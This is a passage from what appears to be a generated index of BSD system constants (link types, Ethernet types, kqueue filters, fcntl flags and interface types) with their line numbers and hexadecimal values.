0x8c constant DLT_MTP2_WITH_PHDR (line 280) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 281) | DLT_MTP3 = 0x8d constant DLT_NULL (line 282) | DLT_NULL = 0x0 constant DLT_PCI_EXP (line 283) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 284) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 285) | DLT_PFSYNC = 0x12 constant DLT_PPI (line 286) | DLT_PPI = 0xc0 constant DLT_PPP (line 287) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 288) | DLT_PPP_BSDOS = 0xe constant DLT_PPP_ETHER (line 289) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 290) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 291) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 292) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PRISM_HEADER (line 293) | DLT_PRISM_HEADER = 0x77 constant DLT_PRONET (line 294) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 295) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 296) | DLT_RAW = 0xc constant DLT_RAWAF_MASK (line 297) | DLT_RAWAF_MASK = 0x2240000 constant DLT_RIO (line 298) | DLT_RIO = 0x7c constant DLT_SCCP (line 299) | DLT_SCCP = 0x8e constant DLT_SITA (line 300) | DLT_SITA = 0xc4 constant DLT_SLIP (line 301) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 302) | DLT_SLIP_BSDOS = 0xd constant DLT_SUNATM (line 303) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 304) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TZSP (line 305) | DLT_TZSP = 0x80 constant DLT_USB (line 306) | DLT_USB = 0xba constant DLT_USB_LINUX (line 307) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 308) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_WIHART (line 309) | DLT_WIHART = 0xdf constant DLT_X2E_SERIAL (line 310) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 311) | DLT_X2E_XORAYA = 0xd6 constant DT_BLK (line 312) | DT_BLK = 0x6 constant DT_CHR (line 313) | DT_CHR = 0x2 constant DT_DIR (line 314) | DT_DIR = 0x4 constant DT_FIFO (line 315) | DT_FIFO = 0x1 constant DT_LNK (line 316) | DT_LNK = 0xa constant DT_REG (line 317) | DT_REG = 0x8 constant DT_SOCK (line 318) | DT_SOCK = 0xc constant DT_UNKNOWN (line 319) | DT_UNKNOWN = 0x0 constant DT_WHT (line 320) | DT_WHT = 0xe constant ECHO (line 321) | ECHO = 0x8 constant ECHOCTL (line 322) | ECHOCTL = 0x40 constant ECHOE (line 323) | ECHOE = 0x2 constant ECHOK (line 324) | ECHOK = 0x4 constant ECHOKE (line 325) | ECHOKE = 0x1 constant ECHONL (line 326) | ECHONL = 0x10 constant ECHOPRT (line 327) | ECHOPRT = 0x20 constant EMUL_LINUX (line 328) | EMUL_LINUX = 0x1 constant EMUL_LINUX32 (line 329) | EMUL_LINUX32 = 0x5 constant EMUL_MAXID (line 330) | EMUL_MAXID = 0x6 constant ETHERCAP_JUMBO_MTU (line 331) | ETHERCAP_JUMBO_MTU = 0x4 constant ETHERCAP_VLAN_HWTAGGING (line 332) | ETHERCAP_VLAN_HWTAGGING = 0x2 constant ETHERCAP_VLAN_MTU (line 333) | ETHERCAP_VLAN_MTU = 0x1 constant ETHERMIN (line 334) | ETHERMIN = 0x2e constant ETHERMTU (line 335) | ETHERMTU = 0x5dc constant ETHERMTU_JUMBO (line 336) | ETHERMTU_JUMBO = 0x2328 constant ETHERTYPE_8023 (line 337) | ETHERTYPE_8023 = 0x4 constant ETHERTYPE_AARP (line 338) | ETHERTYPE_AARP = 0x80f3 constant ETHERTYPE_ACCTON (line 339) | ETHERTYPE_ACCTON = 0x8390 constant ETHERTYPE_AEONIC (line 340) | ETHERTYPE_AEONIC = 0x8036 constant ETHERTYPE_ALPHA (line 341) | ETHERTYPE_ALPHA = 0x814a constant ETHERTYPE_AMBER (line 342) | ETHERTYPE_AMBER = 0x6008 constant ETHERTYPE_AMOEBA (line 343) | ETHERTYPE_AMOEBA = 0x8145 constant ETHERTYPE_APOLLO (line 344) | ETHERTYPE_APOLLO = 0x80f7 constant ETHERTYPE_APOLLODOMAIN (line 345) | ETHERTYPE_APOLLODOMAIN = 0x8019 constant ETHERTYPE_APPLETALK (line 346) | ETHERTYPE_APPLETALK = 0x809b constant ETHERTYPE_APPLITEK (line 347) | ETHERTYPE_APPLITEK = 0x80c7 constant ETHERTYPE_ARGONAUT (line 348) | ETHERTYPE_ARGONAUT = 0x803a constant ETHERTYPE_ARP (line 349) | ETHERTYPE_ARP = 0x806 constant ETHERTYPE_AT (line 350) | ETHERTYPE_AT = 0x809b constant ETHERTYPE_ATALK (line 351) | ETHERTYPE_ATALK = 0x809b constant ETHERTYPE_ATOMIC (line 352) | ETHERTYPE_ATOMIC = 0x86df constant ETHERTYPE_ATT (line 353) | ETHERTYPE_ATT = 0x8069 constant ETHERTYPE_ATTSTANFORD (line 354) | ETHERTYPE_ATTSTANFORD = 0x8008 constant ETHERTYPE_AUTOPHON (line 355) | ETHERTYPE_AUTOPHON = 0x806a constant ETHERTYPE_AXIS (line 356) | ETHERTYPE_AXIS = 0x8856 constant ETHERTYPE_BCLOOP (line 357) | ETHERTYPE_BCLOOP = 0x9003 constant ETHERTYPE_BOFL (line 358) | ETHERTYPE_BOFL = 0x8102 constant ETHERTYPE_CABLETRON (line 359) | ETHERTYPE_CABLETRON = 0x7034 constant ETHERTYPE_CHAOS (line 360) | ETHERTYPE_CHAOS = 0x804 constant ETHERTYPE_COMDESIGN (line 361) | ETHERTYPE_COMDESIGN = 0x806c constant ETHERTYPE_COMPUGRAPHIC (line 362) | ETHERTYPE_COMPUGRAPHIC = 0x806d constant ETHERTYPE_COUNTERPOINT (line 363) | ETHERTYPE_COUNTERPOINT = 0x8062 constant ETHERTYPE_CRONUS (line 364) | ETHERTYPE_CRONUS = 0x8004 constant ETHERTYPE_CRONUSVLN (line 365) | ETHERTYPE_CRONUSVLN = 0x8003 constant ETHERTYPE_DCA (line 366) | ETHERTYPE_DCA = 0x1234 constant ETHERTYPE_DDE (line 367) | ETHERTYPE_DDE = 0x807b constant ETHERTYPE_DEBNI (line 368) | ETHERTYPE_DEBNI = 0xaaaa constant ETHERTYPE_DECAM (line 369) | ETHERTYPE_DECAM = 0x8048 constant ETHERTYPE_DECCUST (line 370) | ETHERTYPE_DECCUST = 0x6006 constant ETHERTYPE_DECDIAG (line 371) | ETHERTYPE_DECDIAG = 0x6005 constant ETHERTYPE_DECDNS (line 372) | ETHERTYPE_DECDNS = 0x803c constant ETHERTYPE_DECDTS (line 373) | ETHERTYPE_DECDTS = 0x803e constant ETHERTYPE_DECEXPER (line 374) | ETHERTYPE_DECEXPER = 0x6000 constant ETHERTYPE_DECLAST (line 375) | ETHERTYPE_DECLAST = 0x8041 constant ETHERTYPE_DECLTM (line 376) | ETHERTYPE_DECLTM = 0x803f constant ETHERTYPE_DECMUMPS (line 377) | ETHERTYPE_DECMUMPS = 0x6009 constant ETHERTYPE_DECNETBIOS (line 378) | ETHERTYPE_DECNETBIOS = 0x8040 constant ETHERTYPE_DELTACON (line 379) | ETHERTYPE_DELTACON = 0x86de constant ETHERTYPE_DIDDLE (line 380) | ETHERTYPE_DIDDLE = 0x4321 constant ETHERTYPE_DLOG1 (line 381) | ETHERTYPE_DLOG1 = 0x660 constant ETHERTYPE_DLOG2 (line 382) | ETHERTYPE_DLOG2 = 0x661 constant ETHERTYPE_DN (line 383) | ETHERTYPE_DN = 0x6003 constant ETHERTYPE_DOGFIGHT (line 384) | ETHERTYPE_DOGFIGHT = 0x1989 constant ETHERTYPE_DSMD (line 385) | ETHERTYPE_DSMD = 0x8039 constant ETHERTYPE_ECMA (line 386) | ETHERTYPE_ECMA = 0x803 constant ETHERTYPE_ENCRYPT (line 387) | ETHERTYPE_ENCRYPT = 0x803d constant ETHERTYPE_ES (line 388) | ETHERTYPE_ES = 0x805d constant ETHERTYPE_EXCELAN (line 389) | ETHERTYPE_EXCELAN = 0x8010 constant ETHERTYPE_EXPERDATA (line 390) | ETHERTYPE_EXPERDATA = 0x8049 constant ETHERTYPE_FLIP (line 391) | ETHERTYPE_FLIP = 0x8146 constant ETHERTYPE_FLOWCONTROL (line 392) | ETHERTYPE_FLOWCONTROL = 0x8808 constant ETHERTYPE_FRARP (line 393) | ETHERTYPE_FRARP = 0x808 constant ETHERTYPE_GENDYN (line 394) | ETHERTYPE_GENDYN = 0x8068 constant ETHERTYPE_HAYES (line 395) | ETHERTYPE_HAYES = 0x8130 constant ETHERTYPE_HIPPI_FP (line 396) | ETHERTYPE_HIPPI_FP = 0x8180 constant ETHERTYPE_HITACHI (line 397) | ETHERTYPE_HITACHI = 0x8820 constant ETHERTYPE_HP (line 398) | ETHERTYPE_HP = 0x8005 constant ETHERTYPE_IEEEPUP (line 399) | ETHERTYPE_IEEEPUP = 0xa00 constant ETHERTYPE_IEEEPUPAT (line 400) | ETHERTYPE_IEEEPUPAT = 0xa01 constant ETHERTYPE_IMLBL (line 401) | ETHERTYPE_IMLBL = 0x4c42 constant ETHERTYPE_IMLBLDIAG (line 402) | ETHERTYPE_IMLBLDIAG = 0x424c constant ETHERTYPE_IP (line 403) | ETHERTYPE_IP = 0x800 constant ETHERTYPE_IPAS (line 404) | ETHERTYPE_IPAS = 0x876c constant ETHERTYPE_IPV6 (line 405) | ETHERTYPE_IPV6 = 0x86dd constant ETHERTYPE_IPX (line 406) | ETHERTYPE_IPX = 0x8137 constant ETHERTYPE_IPXNEW (line 407) | ETHERTYPE_IPXNEW = 0x8037 constant ETHERTYPE_KALPANA (line 408) | ETHERTYPE_KALPANA = 0x8582 constant ETHERTYPE_LANBRIDGE (line 409) | ETHERTYPE_LANBRIDGE = 0x8038 constant ETHERTYPE_LANPROBE (line 410) | ETHERTYPE_LANPROBE = 0x8888 constant ETHERTYPE_LAT (line 411) | ETHERTYPE_LAT = 0x6004 constant ETHERTYPE_LBACK (line 412) | ETHERTYPE_LBACK = 0x9000 constant ETHERTYPE_LITTLE (line 413) | ETHERTYPE_LITTLE = 0x8060 constant ETHERTYPE_LOGICRAFT (line 414) | ETHERTYPE_LOGICRAFT = 0x8148 constant ETHERTYPE_LOOPBACK (line 415) | ETHERTYPE_LOOPBACK = 0x9000 constant ETHERTYPE_MATRA (line 416) | ETHERTYPE_MATRA = 0x807a constant ETHERTYPE_MAX (line 417) | ETHERTYPE_MAX = 0xffff constant ETHERTYPE_MERIT (line 418) | ETHERTYPE_MERIT = 0x807c constant ETHERTYPE_MICP (line 419) | ETHERTYPE_MICP = 0x873a constant ETHERTYPE_MOPDL (line 420) | ETHERTYPE_MOPDL = 0x6001 constant ETHERTYPE_MOPRC (line 421) | ETHERTYPE_MOPRC = 0x6002 constant ETHERTYPE_MOTOROLA (line 422) | ETHERTYPE_MOTOROLA = 0x818d constant ETHERTYPE_MPLS (line 423) | ETHERTYPE_MPLS = 0x8847 constant ETHERTYPE_MPLS_MCAST (line 424) | ETHERTYPE_MPLS_MCAST = 0x8848 constant ETHERTYPE_MUMPS (line 425) | ETHERTYPE_MUMPS = 0x813f constant ETHERTYPE_NBPCC (line 426) | ETHERTYPE_NBPCC = 0x3c04 constant ETHERTYPE_NBPCLAIM (line 427) | ETHERTYPE_NBPCLAIM = 0x3c09 constant ETHERTYPE_NBPCLREQ (line 428) | ETHERTYPE_NBPCLREQ = 0x3c05 constant ETHERTYPE_NBPCLRSP (line 429) | ETHERTYPE_NBPCLRSP = 0x3c06 constant ETHERTYPE_NBPCREQ (line 430) | ETHERTYPE_NBPCREQ = 0x3c02 constant ETHERTYPE_NBPCRSP (line 431) | ETHERTYPE_NBPCRSP = 0x3c03 constant ETHERTYPE_NBPDG (line 432) | ETHERTYPE_NBPDG = 0x3c07 constant ETHERTYPE_NBPDGB (line 433) | ETHERTYPE_NBPDGB = 0x3c08 constant ETHERTYPE_NBPDLTE (line 434) | ETHERTYPE_NBPDLTE = 0x3c0a constant ETHERTYPE_NBPRAR (line 435) | ETHERTYPE_NBPRAR = 0x3c0c constant ETHERTYPE_NBPRAS (line 436) | ETHERTYPE_NBPRAS = 0x3c0b constant ETHERTYPE_NBPRST (line 437) | ETHERTYPE_NBPRST = 0x3c0d constant ETHERTYPE_NBPSCD (line 438) | ETHERTYPE_NBPSCD = 0x3c01 constant ETHERTYPE_NBPVCD (line 439) | ETHERTYPE_NBPVCD = 0x3c00 constant ETHERTYPE_NBS (line 440) | ETHERTYPE_NBS = 0x802 constant ETHERTYPE_NCD (line 441) | ETHERTYPE_NCD = 0x8149 constant ETHERTYPE_NESTAR (line 442) | ETHERTYPE_NESTAR = 0x8006 constant ETHERTYPE_NETBEUI (line 443) | ETHERTYPE_NETBEUI = 0x8191 constant ETHERTYPE_NOVELL (line 444) | ETHERTYPE_NOVELL = 0x8138 constant ETHERTYPE_NS (line 445) | ETHERTYPE_NS = 0x600 constant ETHERTYPE_NSAT (line 446) | ETHERTYPE_NSAT = 0x601 constant ETHERTYPE_NSCOMPAT (line 447) | ETHERTYPE_NSCOMPAT = 0x807 constant ETHERTYPE_NTRAILER (line 448) | ETHERTYPE_NTRAILER = 0x10 constant ETHERTYPE_OS9 (line 449) | ETHERTYPE_OS9 = 0x7007 constant ETHERTYPE_OS9NET (line 450) | ETHERTYPE_OS9NET = 0x7009 constant ETHERTYPE_PACER (line 451) | ETHERTYPE_PACER = 0x80c6 constant ETHERTYPE_PAE (line 452) | ETHERTYPE_PAE = 0x888e constant ETHERTYPE_PCS (line 453) | ETHERTYPE_PCS = 0x4242 constant ETHERTYPE_PLANNING (line 454) | ETHERTYPE_PLANNING = 0x8044 constant ETHERTYPE_PPP (line 455) | ETHERTYPE_PPP = 0x880b constant ETHERTYPE_PPPOE (line 456) | ETHERTYPE_PPPOE = 0x8864 constant ETHERTYPE_PPPOEDISC (line 457) | ETHERTYPE_PPPOEDISC = 0x8863 constant ETHERTYPE_PRIMENTS (line 458) | ETHERTYPE_PRIMENTS = 0x7031 constant ETHERTYPE_PUP (line 459) | ETHERTYPE_PUP = 0x200 constant ETHERTYPE_PUPAT (line 460) | ETHERTYPE_PUPAT = 0x200 constant ETHERTYPE_RACAL (line 461) | ETHERTYPE_RACAL = 0x7030 constant ETHERTYPE_RATIONAL (line 462) | ETHERTYPE_RATIONAL = 0x8150 constant ETHERTYPE_RAWFR (line 463) | ETHERTYPE_RAWFR = 0x6559 constant ETHERTYPE_RCL (line 464) | ETHERTYPE_RCL = 0x1995 constant ETHERTYPE_RDP (line 465) | ETHERTYPE_RDP = 0x8739 constant ETHERTYPE_RETIX (line 466) | ETHERTYPE_RETIX = 0x80f2 constant ETHERTYPE_REVARP (line 467) | ETHERTYPE_REVARP = 0x8035 constant ETHERTYPE_SCA (line 468) | ETHERTYPE_SCA = 0x6007 constant ETHERTYPE_SECTRA (line 469) | ETHERTYPE_SECTRA = 0x86db constant ETHERTYPE_SECUREDATA (line 470) | ETHERTYPE_SECUREDATA = 0x876d constant ETHERTYPE_SGITW (line 471) | ETHERTYPE_SGITW = 0x817e constant ETHERTYPE_SG_BOUNCE (line 472) | ETHERTYPE_SG_BOUNCE = 0x8016 constant ETHERTYPE_SG_DIAG (line 473) | ETHERTYPE_SG_DIAG = 0x8013 constant ETHERTYPE_SG_NETGAMES (line 474) | ETHERTYPE_SG_NETGAMES = 0x8014 constant ETHERTYPE_SG_RESV (line 475) | ETHERTYPE_SG_RESV = 0x8015 constant ETHERTYPE_SIMNET (line 476) | ETHERTYPE_SIMNET = 0x5208 constant ETHERTYPE_SLOWPROTOCOLS (line 477) | ETHERTYPE_SLOWPROTOCOLS = 0x8809 constant ETHERTYPE_SNA (line 478) | ETHERTYPE_SNA = 0x80d5 constant ETHERTYPE_SNMP (line 479) | ETHERTYPE_SNMP = 0x814c constant ETHERTYPE_SONIX (line 480) | ETHERTYPE_SONIX = 0xfaf5 constant ETHERTYPE_SPIDER (line 481) | ETHERTYPE_SPIDER = 0x809f constant ETHERTYPE_SPRITE (line 482) | ETHERTYPE_SPRITE = 0x500 constant ETHERTYPE_STP (line 483) | ETHERTYPE_STP = 0x8181 constant ETHERTYPE_TALARIS (line 484) | ETHERTYPE_TALARIS = 0x812b constant ETHERTYPE_TALARISMC (line 485) | ETHERTYPE_TALARISMC = 0x852b constant ETHERTYPE_TCPCOMP (line 486) | ETHERTYPE_TCPCOMP = 0x876b constant ETHERTYPE_TCPSM (line 487) | ETHERTYPE_TCPSM = 0x9002 constant ETHERTYPE_TEC (line 488) | ETHERTYPE_TEC = 0x814f constant ETHERTYPE_TIGAN (line 489) | ETHERTYPE_TIGAN = 0x802f constant ETHERTYPE_TRAIL (line 490) | ETHERTYPE_TRAIL = 0x1000 constant ETHERTYPE_TRANSETHER (line 491) | ETHERTYPE_TRANSETHER = 0x6558 constant ETHERTYPE_TYMSHARE (line 492) | ETHERTYPE_TYMSHARE = 0x802e constant ETHERTYPE_UBBST (line 493) | ETHERTYPE_UBBST = 0x7005 constant ETHERTYPE_UBDEBUG (line 494) | ETHERTYPE_UBDEBUG = 0x900 constant ETHERTYPE_UBDIAGLOOP (line 495) | ETHERTYPE_UBDIAGLOOP = 0x7002 constant ETHERTYPE_UBDL (line 496) | ETHERTYPE_UBDL = 0x7000 constant ETHERTYPE_UBNIU (line 497) | ETHERTYPE_UBNIU = 0x7001 constant ETHERTYPE_UBNMC (line 498) | ETHERTYPE_UBNMC = 0x7003 constant ETHERTYPE_VALID (line 499) | ETHERTYPE_VALID = 0x1600 constant ETHERTYPE_VARIAN (line 500) | ETHERTYPE_VARIAN = 0x80dd constant ETHERTYPE_VAXELN (line 501) | ETHERTYPE_VAXELN = 0x803b constant ETHERTYPE_VEECO (line 502) | ETHERTYPE_VEECO = 0x8067 constant ETHERTYPE_VEXP (line 503) | ETHERTYPE_VEXP = 0x805b constant ETHERTYPE_VGLAB (line 504) | ETHERTYPE_VGLAB = 0x8131 constant ETHERTYPE_VINES (line 505) | ETHERTYPE_VINES = 0xbad constant ETHERTYPE_VINESECHO (line 506) | ETHERTYPE_VINESECHO = 0xbaf constant ETHERTYPE_VINESLOOP (line 507) | ETHERTYPE_VINESLOOP = 0xbae constant ETHERTYPE_VITAL (line 508) | ETHERTYPE_VITAL = 0xff00 constant ETHERTYPE_VLAN (line 509) | ETHERTYPE_VLAN = 0x8100 constant ETHERTYPE_VLTLMAN (line 510) | ETHERTYPE_VLTLMAN = 0x8080 constant ETHERTYPE_VPROD (line 511) | ETHERTYPE_VPROD = 0x805c constant ETHERTYPE_VURESERVED (line 512) | ETHERTYPE_VURESERVED = 0x8147 constant ETHERTYPE_WATERLOO (line 513) | ETHERTYPE_WATERLOO = 0x8130 constant ETHERTYPE_WELLFLEET (line 514) | ETHERTYPE_WELLFLEET = 0x8103 constant ETHERTYPE_X25 (line 515) | ETHERTYPE_X25 = 0x805 constant ETHERTYPE_X75 (line 516) | ETHERTYPE_X75 = 0x801 constant ETHERTYPE_XNSSM (line 517) | ETHERTYPE_XNSSM = 0x9001 constant ETHERTYPE_XTP (line 518) | ETHERTYPE_XTP = 0x817d constant ETHER_ADDR_LEN (line 519) | ETHER_ADDR_LEN = 0x6 constant ETHER_CRC_LEN (line 520) | ETHER_CRC_LEN = 0x4 constant ETHER_CRC_POLY_BE (line 521) | ETHER_CRC_POLY_BE = 0x4c11db6 constant ETHER_CRC_POLY_LE (line 522) | ETHER_CRC_POLY_LE = 0xedb88320 constant ETHER_HDR_LEN (line 523) | ETHER_HDR_LEN = 0xe constant ETHER_MAX_LEN (line 524) | ETHER_MAX_LEN = 0x5ee constant ETHER_MAX_LEN_JUMBO (line 525) | ETHER_MAX_LEN_JUMBO = 0x233a constant ETHER_MIN_LEN (line 526) | ETHER_MIN_LEN = 0x40 constant ETHER_PPPOE_ENCAP_LEN (line 527) | ETHER_PPPOE_ENCAP_LEN = 0x8 constant ETHER_TYPE_LEN (line 528) | ETHER_TYPE_LEN = 0x2 constant ETHER_VLAN_ENCAP_LEN (line 529) | ETHER_VLAN_ENCAP_LEN = 0x4 constant EVFILT_AIO (line 530) | EVFILT_AIO = 0x2 constant EVFILT_PROC (line 531) | EVFILT_PROC = 0x4 constant EVFILT_READ (line 532) | EVFILT_READ = 0x0 constant EVFILT_SIGNAL (line 533) | EVFILT_SIGNAL = 0x5 constant EVFILT_SYSCOUNT (line 534) | EVFILT_SYSCOUNT = 0x7 constant EVFILT_TIMER (line 535) | EVFILT_TIMER = 0x6 constant EVFILT_VNODE (line 536) | EVFILT_VNODE = 0x3 constant EVFILT_WRITE (line 537) | EVFILT_WRITE = 0x1 constant EV_ADD (line 538) | EV_ADD = 0x1 constant EV_CLEAR (line 539) | EV_CLEAR = 0x20 constant EV_DELETE (line 540) | EV_DELETE = 0x2 constant EV_DISABLE (line 541) | EV_DISABLE = 0x8 constant EV_ENABLE (line 542) | EV_ENABLE = 0x4 constant EV_EOF (line 543) | EV_EOF = 0x8000 constant EV_ERROR (line 544) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 545) | EV_FLAG1 = 0x2000 constant EV_ONESHOT (line 546) | EV_ONESHOT = 0x10 constant EV_SYSFLAGS (line 547) | EV_SYSFLAGS = 0xf000 constant EXTA (line 548) | EXTA = 0x4b00 constant EXTATTR_CMD_START (line 549) | EXTATTR_CMD_START = 0x1 constant EXTATTR_CMD_STOP (line 550) | EXTATTR_CMD_STOP = 0x2 constant EXTATTR_NAMESPACE_SYSTEM (line 551) | EXTATTR_NAMESPACE_SYSTEM = 0x2 constant EXTATTR_NAMESPACE_USER (line 552) | EXTATTR_NAMESPACE_USER = 0x1 constant EXTB (line 553) | EXTB = 0x9600 constant EXTPROC (line 554) | EXTPROC = 0x800 constant FD_CLOEXEC (line 555) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 556) | FD_SETSIZE = 0x100 constant FLUSHO (line 557) | FLUSHO = 0x800000 constant F_CLOSEM (line 558) | F_CLOSEM = 0xa constant F_DUPFD (line 559) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 560) | F_DUPFD_CLOEXEC = 0xc constant F_FSCTL (line 561) | F_FSCTL = -0x80000000 constant F_FSDIRMASK (line 562) | F_FSDIRMASK = 0x70000000 constant F_FSIN (line 563) | F_FSIN = 0x10000000 constant F_FSINOUT (line 564) | F_FSINOUT = 0x30000000 constant F_FSOUT (line 565) | F_FSOUT = 0x20000000 constant F_FSPRIV (line 566) | F_FSPRIV = 0x8000 constant F_FSVOID (line 567) | F_FSVOID = 0x40000000 constant F_GETFD (line 568) | F_GETFD = 0x1 constant F_GETFL (line 569) | F_GETFL = 0x3 constant F_GETLK (line 570) | F_GETLK = 0x7 constant F_GETNOSIGPIPE (line 571) | F_GETNOSIGPIPE = 0xd constant F_GETOWN (line 572) | F_GETOWN = 0x5 constant F_MAXFD (line 573) | F_MAXFD = 0xb constant F_OK (line 574) | F_OK = 0x0 constant F_PARAM_MASK (line 575) | F_PARAM_MASK = 0xfff constant F_PARAM_MAX (line 576) | F_PARAM_MAX = 0xfff constant F_RDLCK (line 577) | F_RDLCK = 0x1 constant F_SETFD (line 578) | F_SETFD = 0x2 constant F_SETFL (line 579) | F_SETFL = 0x4 constant F_SETLK (line 580) | F_SETLK = 0x8 constant F_SETLKW (line 581) | F_SETLKW = 0x9 constant F_SETNOSIGPIPE (line 582) | F_SETNOSIGPIPE = 0xe constant F_SETOWN (line 583) | F_SETOWN = 0x6 constant F_UNLCK (line 584) | F_UNLCK = 0x2 constant F_WRLCK (line 585) | F_WRLCK = 0x3 constant HUPCL (line 586) | HUPCL = 0x4000 constant HW_MACHINE (line 587) | HW_MACHINE = 0x1 constant ICANON (line 588) | ICANON = 0x100 constant ICMP6_FILTER (line 589) | ICMP6_FILTER = 0x12 constant ICRNL (line 590) | ICRNL = 0x100 constant IEXTEN (line 591) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 592) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 593) | IFAN_DEPARTURE = 0x1 constant IFA_ROUTE (line 594) | IFA_ROUTE = 0x1 constant IFF_ALLMULTI (line 595) | IFF_ALLMULTI = 0x200 constant IFF_BROADCAST (line 596) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 597) | IFF_CANTCHANGE = 0x8f52 constant IFF_DEBUG (line 598) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 599) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 600) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 601) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 602) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 603) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 604) | IFF_NOARP = 0x80 constant IFF_NOTRAILERS (line 605) | IFF_NOTRAILERS = 0x20 constant IFF_OACTIVE (line 606) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 607) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 608) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 609) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 610) | IFF_SIMPLEX = 0x800 constant IFF_UP (line 611) | IFF_UP = 0x1 constant IFNAMSIZ (line 612) | IFNAMSIZ = 0x10 constant IFT_1822 (line 613) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 614) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 615) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 616) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 617) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 618) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 619) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 620) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 621) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 622) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 623) | IFT_ASYNC = 0x54 constant IFT_ATM (line 624) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 625) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 626) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 627) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 628) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 629) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 630) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 631) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 632) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 633) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BRIDGE (line 634) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 635) | IFT_BSC = 0x53 constant IFT_CARP (line 636) | IFT_CARP = 0xf8 constant IFT_CCTEMUL (line 637) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 638) | IFT_CEPT = 0x13 constant IFT_CES (line 639) | IFT_CES = 0x85 constant IFT_CHANNEL (line 640) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 641) | IFT_CNR = 0x55 constant IFT_COFFEE (line 642) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 643) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 644) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 645) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 646) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 647) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 648) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 649) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 650) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DOCSCABLEUPSTREAMCHANNEL (line 651) | IFT_DOCSCABLEUPSTREAMCHANNEL = 0xcd constant IFT_DS0 (line 652) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 653) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 654) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 655) | IFT_DS3 = 0x1e constant IFT_DTM (line 656) | IFT_DTM = 0x8c constant IFT_DVBASILN (line 657) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 658) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 659) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 660) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 661) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ECONET (line 662) | IFT_ECONET = 0xce constant IFT_EON (line 663) | IFT_EON = 0x19 constant IFT_EPLRS (line 664) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 665) | IFT_ESCON = 0x49 constant IFT_ETHER (line 666) | IFT_ETHER = 0x6 constant IFT_FAITH (line 667) | IFT_FAITH = 0xf2 constant IFT_FAST (line 668) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 